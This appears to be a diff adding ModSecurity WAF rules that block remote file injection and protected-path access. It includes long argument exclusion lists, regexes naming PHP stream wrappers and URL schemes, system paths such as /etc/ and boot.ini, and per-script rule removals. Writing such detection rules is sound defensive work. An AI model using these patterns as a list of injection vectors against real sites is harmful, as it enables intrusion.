+SecRule ARGS|!ARGS:short|!ARGS:keywords|!ARGS:/code/|!ARGS:plaatje|!ARGS:ranking_info|!ARGS:/callback/|!ARGS:subject|!ARGS:pic|!ARGS:/sponsors/|!ARGS:want2Read|!ARGS:/webcam/|!ARGS:search_string|!ARGS:direct|!ARGS:yt_thumb|!ARGS:fflv|!ARGS:direct|!ARGS:/site/|!ARGS:source_location|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:user_mail_register_no_approval_required_body|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:/webseite/|!ARGS:/^utm/|!ARGS:resolution|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:/message/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:/youtube/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:pic1|!ARGS:/click/|!ARGS:rf|!ARGS:/web/|!ARGS:/home/|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:/^win/|!ARGS:lec_rm|!ARGS:n-state|!ARGS:/img/|!ARGS:Stream|!ARGS:CP_email|!ARGS:flvsite|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:attribute29|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:/server/|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:V_feed_email|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:/^description/|!ARGS:notification_body|!ARGS:sitead|!ARGS:/^product_long_/|!ARGS:/^topic_content_/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:address|!ARGS:board_msg|!ARGS:logo_path|!ARGS:prehtml_root|!ARGS:revpro_video|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/html_content/|!ARGS:desc|!ARGS:descripcion|!ARGS:body_html|!ARGS:/^field_id_/|!ARGS:wpUploadDescription|!ARGS:customer_footer|!ARGS:FAQTitle|!ARGS:host|!ARGS:/text/|!ARGS:whereto|!ARGS:/description/|!ARGS:item[content]|!ARGS:pathToPiwik|!ARGS:admin_footer|!ARGS:email_sig|!ARGS:minicms_content|!ARGS:feed|!ARGS:/^artsee_banner_/|!ARGS:pingback_service|!ARGS:showStr|!ARGS:hostname|!ARGS:htmlSource|!ARGS:/virtual_http_path/|!ARGS:/virtual_https_path/|!ARGS:f_content|!ARGS:bannercode|!ARGS:email_forward|!ARGS:fetch|!ARGS:/txt/|!ARGS:blog|!ARGS:RTServerName|!ARGS:mesg|!ARGS:forward|!ARGS:atc_content|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/^commontemplate/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:footer_scripts|!ARGS:advBannerMessage|!ARGS:thumb|!ARGS:question_content|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:forum_desc|!ARGS:file_contents|!ARGS:newDesc|!ARGS:return_to|!ARGS:Stream|!ARGS:contents|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:cat_sponsor|!ARGS:stretch|!ARGS:/^fields_prev/|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:var_value[usps_labels_help_2]|!ARGS:short_story|!ARGS:intro_content|!ARGS:vinculo|!ARGS:openid_return_to|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:fulldescr|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:/link/|!ARGS:faqText|!ARGS:request_uri|!ARGS:google|!ARGS:definition|!ARGS:openid.return_to|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:from_href|!ARGS:Comentario|!ARGS:dynadata[_SIGNATURE]|!ARGS:ppicture|!ARGS:paypal_ipn|!ARGS:defaultImage|!ARGS:title|!ARGS:html|!ARGS:dbody|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:commontemplate[header]|!ARGS:uri|!ARGS:/^blockbody/|!ARGS:field11|!ARGS:field_id_7|!ARGS:/^ViewState/|!ARGS:vars[DBhostname]|!ARGS:postvars|!ARGS:base1|!ARGS:cart_header|!ARGS:setting[description]|!ARGS:video_google|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:full_story|!ARGS:source|!ARGS:set_static_uri_to|!ARGS:livesite|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:ret_address|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:html_code|!ARGS:/http_script_dir/|!ARGS:cfgfilecontent|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:/Website/|!ARGS:sig|!ARGS:template_data|!ARGS:template|!ARGS:option[ping_sites]|!ARGS:KT_Update1|!ARGS:flds[Message]|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:vars[siteName]|!ARGS:replycontents|!ARGS:sitedisclaimer|!ARGS:sm_b_style|!ARGS:success|!ARGS:/^css/|!ARGS:short_story|!ARGS:ecards_more_pic_target|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:/^products_description/|!ARGS:terms_content|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:revnews_video|!ARGS:/sponsor_banner/|!ARGS:videoPath|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:savecontent|!ARGS:agendWebPage|!ARGS:params[helpsite]|!ARGS:iconnew|!ARGS:wpau-ftphost|!ARGS:gen_header|!ARGS:button_dir|!ARGS:news_desc|!ARGS:x_organizational|!ARGS:href|!ARGS:form_element3|!ARGS:wptextbox1|!ARGS:edit[site_mission]|!ARGS:answer|!ARGS:intro|!ARGS:note|!ARGS:c_msg|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/^sql_/|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/^rss/|!ARGS:/rss$/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:team[logo]|!ARGS:helpbox|!ARGS:return|!ARGS:basehref|!ARGS:/^redirect/|!ARGS:redir|!ARGS:ret|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:portal_body|!ARGS:filecontent|!ARGS:inc|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:body|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:notes|!ARGS:missing_fields_redirect|!ARGS:templatePath|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:oldmsg|!ARGS:/redirect/|!ARGS:src|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:site_desc|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:site|!ARGS:memo|!ARGS:live_site|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:g2_return|!ARGS:goto|!ARGS:site_first|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:fb_ref|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:pp_bio_content|!ARGS:xajaxargs[]|!ARGS:backto|!ARGS:/^http/|!ARGS:/^rsargs/|!ARGS:op|!ARGS:BLK_block_content|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:hamechalets_desc|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:description|!ARGS:ret|!ARGS:newDescription|!ARGS:area|!ARGS:content|!ARGS:/^data\[tt_content\]/|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:newcontent|!ARGS:st_widget|!ARGS:video|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:Store_OUI_GlobalFooter|!ARGS:in[http]|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:virtual_http_path|!ARGS:cta_content|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:/^virtual_http/|!ARGS:cta_content|!ARGS:map_description_1|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:field5|!ARGS:p_content|!ARGS:f_site|!ARGS:CANCEL_RETURN "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"          "phase:2,deny,log,auditlog,status:403,capture,id:340873,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:keywords|!ARGS:short|!ARGS:plaatje|!ARGS:ranking_info|!ARGS:/code/|!ARGS:/callback/|!ARGS:pic|!ARGS:/sponsors/|!ARGS:want2Read|!ARGS:/webcam/|!ARGS:search_string|!ARGS:yt_thumb|!ARGS:subject|!ARGS:direct|!ARGS:user_mail_register_no_approval_required_body|!ARGS:fflv|!ARGS:direct|!ARGS:/site/|!ARGS:source_location/|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:/openid_identifier|!ARGS:/adres/|!ARGS:/logo/|!ARGS:/webseite/|!ARGS:resolution|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:/message/|!ARGS:/^utm/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:/youtube/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:pic1|!ARGS:clickTag1|!ARGS:rf|!ARGS:web|!ARGS:/home/|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:lec_rm|!ARGS:n-state|!ARGS:/img/|!ARGS:Stream|!ARGS:CP_email|!ARGS:flvsite|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:/^clickTagFrame/|!ARGS:attribute29|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:/^GARS_existing/|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:notification_body|!ARGS:sitead|!ARGS:/^product_long/|!ARGS:/server/|!ARGS:/^topic_content/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:address|!ARGS:board_msg|!ARGS:logo_path|!ARGS:prehtml_root|!ARGS:revpro_video|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/html_content/|!ARGS:desc|!ARGS:body_html|!ARGS:/^field_id_/|!ARGS:wpUploadDescription|!ARGS:/footer/|!ARGS:FAQTitle|!ARGS:host|!ARGS:webpath|!ARGS:/text/|!ARGS:whereto|!ARGS:/description/|!ARGS:item[content]|!ARGS:pathToPiwik|!ARGS:email_sig|!ARGS:minicms_content|!ARGS:feed|!ARGS:/^artsee_banner_/|!ARGS:fetch|!ARGS:pingback_service|!ARGS:hostname|!ARGS:htmlSource|!ARGS:/virtual_http_path/|!ARGS:/virtual_https_path/|!ARGS:f_content|!ARGS:email_forward|!ARGS:blog|!ARGS:RTServerName|!ARGS:mesg|!ARGS:forward|!ARGS:atc_content|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/^commontemplate/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:advBannerMessage|!ARGS:thumb|!ARGS:question_content|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:newDesc|!ARGS:forum_desc|!ARGS:file_contents|!ARGS:return_to|!ARGS:Stream|!ARGS:contents|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:newwebpath|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:stretch|!ARGS:cat_sponsor|!ARGS:/^fields_prev/|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:var_value[usps_labels_help_2]|!ARGS:short_story|!ARGS:intro_content|!ARGS:vinculo|!ARGS:openid_return_to|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:fulldescr|!ARGS:soundname|!ARGS:Direccionsitioweb|!ARGS:/link/|!ARGS:faqText|!ARGS:request_uri|!ARGS:google|!ARGS:ud_web|!ARGS:openid.return_to|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:from_href|!ARGS:Comentario|!ARGS:/^dynadata/|!ARGS:ppicture|!ARGS:paypal_ipn|!ARGS:defaultImage|!ARGS:title|!ARGS:html|!ARGS:dbody|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:uri|!ARGS:commontemplate[header]|!ARGS:/^blockbody/|!ARGS:field11|!ARGS:field_id_7|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:vars[DBhostname]|!ARGS:base1|!ARGS:cart_header|!ARGS:setting[description]|!ARGS:webcam|!ARGS:video_google|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:full_story|!ARGS:source|!ARGS:set_static_uri_to|!ARGS:livesite|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:ret_address|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:/webaddress/|!ARGS:/http_script_dir/|!ARGS:cfgfilecontent|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:/Website/|!ARGS:sig|!ARGS:template_data|!ARGS:template|!ARGS:option[ping_sites]|!ARGS:KT_Update1|!ARGS:flds[Message]|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:vars[siteName]|!ARGS:replycontents|!ARGS:sitedisclaimer|!ARGS:sm_b_style|!ARGS:success|!ARGS:short_story|!ARGS:/^css/|!ARGS:ecards_more_pic_target|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:/^products_description/|!ARGS:terms_content|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:revnews_video|!ARGS:/sponsor_banner/|!ARGS:videoPath|!ARGS:web_site|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:savecontent|!ARGS:params[helpsite]|!ARGS:iconnew|!ARGS:agendWebPage|!ARGS:wpau-ftphost|!ARGS:gen_header|!ARGS:button_dir|!ARGS:news_desc|!ARGS:x_organizational|!ARGS:href|!ARGS:form_element3|!ARGS:wptextbox1|!ARGS:edit[site_mission]|!ARGS:answer|!ARGS:intro|!ARGS:c_msg|!ARGS:note|!ARGS:domain|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/^sql_/|!ARGS:clickTAG|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/^rss/|!ARGS:/rss$/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:team[logo]|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:basehref|!ARGS:/redirect/|!ARGS:redir|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:portal_body|!ARGS:filecontent|!ARGS:inc|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:body|!ARGS:Post|!ARGS:data[Label][website]|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:webeditor1|!ARGS:oldmsg|!ARGS:src|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:site_desc|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:jumpTo|!ARGS:site|!ARGS:memo|!ARGS:live_site|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:user_website|!ARGS:g2_return|!ARGS:goto|!ARGS:site_first|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:userDetails[web_address]|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:web_address|!ARGS:msgpreview|!ARGS:fb_ref|!ARGS:notes|!ARGS:pn_domain|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:value_190|!ARGS:pp_bio_content|!ARGS:xajaxargs[]|!ARGS:backto|!ARGS:/^http/|!ARGS:/^rsargs/|!ARGS:op|!ARGS:BLK_block_content|!ARGS:ret|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:hamechalets_desc|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:description|!ARGS:newDescription|!ARGS:area|!ARGS:content|!ARGS:/^data\[tt_content\]/|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:newcontent|!ARGS:st_widget|!ARGS:video|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:Store_OUI_GlobalFooter|!ARGS:in[http]|!ARGS:map|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:virtual_http_path|!ARGS:cta_content|!ARGS:x_website|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:/^virtual_http/|!ARGS:cta_content|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:code|!ARGS:field5|!ARGS:p_content|!ARGS:f_site|!ARGS:CANCEL_RETURN "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"           "phase:2,deny,log,auditlog,status:403,id:340874,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,capture,chain,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91600
+
+SecRule REQUEST_FILENAME "/mailordermanager5\.mvc" "phase:2,id:91601,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/content_pop\.php" "phase:2,id:91602,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/backend/noticias_abm\.php" "phase:2,id:91603,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/pncrtl/options\.php" "phase:2,id:91604,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin\.cgi" "phase:2,id:91605,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340855,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=340131,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/fim_thumb\.php" "phase:2,id:91606,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"
+
+SecRule REQUEST_FILENAME "/intaketemp\.php" "phase:2,id:91607,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/sqltoexcel/sql2excel\.php" "phase:2,id:91608,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016"
+
+SecRule REQUEST_FILENAME "/moodle/mod/glossary/edit\.php" "phase:2,id:91609,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/miespacio/adpaepdc\.php" "phase:2,id:91610,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "ext/ics_awstats/mod1/index\.php" "phase:2,id:91611,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340026,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340151"
+SecAction "phase:2,id:91612,t:none,pass,nolog,skipAfter:END_RULES_91612"
+
+SecRule ARGS|!ARGS:config "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:320463,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (modules.php)'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:config "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:320462,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (modules.php)'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91612
+
+SecRule REQUEST_FILENAME "/wizard/edit/modules/eshop/product/insert" "phase:2,id:91613,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340009"
+SecAction "phase:2,id:91614,t:none,pass,nolog,skipAfter:END_RULES_91614"
+
+SecRule REQUEST_HEADERS|!REQUEST_HEADERS:X-PageView|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:REFERER|ARGS|!ARGS:redirect_to|!ARGS:field_id_29|!ARGS:/highlight/|!ARGS:/search/|!ARGS:/msg/|!ARGS:/comment/|!ARGS:/hilit/|!ARGS:/uri/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/description/|!ARGS:product[media_gallery][images]|!ARGS:/subject/|!ARGS:/comment/|!ARGS:/content/|!ARGS:/data/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/post/|!ARGS:LiveURLSegment|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:/description/|!ARGS:note_title|!ARGS:/^xjxargs/|!ARGS:backPath|!ARGS:webpage[content]|!ARGS:article[content]|!ARGS:filecontent|!ARGS:/message/|!ARGS:/^fck_/|!ARGS:htmlSource|!ARGS:path_to_lzx|!ARGS:content|!ARGS:/body/ "(?:/(?:etc|proc|var/tmp|usr|opt|s?bin|dev|kern|[br]oot|sys|windows|winnt)/|(?:\/|\\\\)+inetpub|localstart\.asp|boot\.ini)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:normalisePath,t:lowercase,capture,id:321463,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Protected Path Access denied in URI/ARGS',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_91614
+
